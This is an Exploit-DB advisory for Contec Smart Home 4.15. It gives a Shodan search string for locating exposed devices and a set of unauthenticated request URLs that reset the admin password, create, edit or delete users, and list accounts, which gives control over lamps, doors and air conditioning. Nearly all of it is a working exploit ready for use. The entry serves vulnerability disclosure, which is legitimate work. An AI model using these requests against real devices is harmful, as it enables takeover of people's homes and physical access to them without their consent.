Contec Smart Home 4.15 - Unauthorized Password Reset

EDB-ID: 44295
Author: Z3ro0ne
Published: 2018-03-16
CVE: N/A
Type: Webapps
Platform: Hardware
Vulnerable App: N/A

 # Shodan Dork		 : "content/smarthome.php" 
# Vendor Homepage : http://contec.co.il
# Tested on : Google Chrome
# Tested version : 4.15
# Date : 2018-03-14
# Author : Z3ro0ne
# Contact : [email protected]
# Facebook Page : https://www.facebook.com/Z3ro0ne

# Vulnerability description :
the Vulnerability allow unauthenticated attacker to remotely bypass authentication and change admin password without old password and control (lamps,doors,air conditioner...)


# Exploit

To Reset Admin password
http://Ipaddress:port/content/new_user.php?user_name=ADMIN&password=NEWPASSWORD&group_id=1

To Create a new user
http://Ipaddress:port/content/new_user.php?user_name=NEWUSER&password=NEWPASSWORD&group_id=1

To edit a user
http://Ipaddress:port/content/edit_user.php?user_name=USER&password=NEWPASSWORD&group_id=1

To Delete a user
http://Ipaddress:port/content/delete_user.php?user_name=USER

Users list
http://Ipaddress:port/content/user.php

Related Posts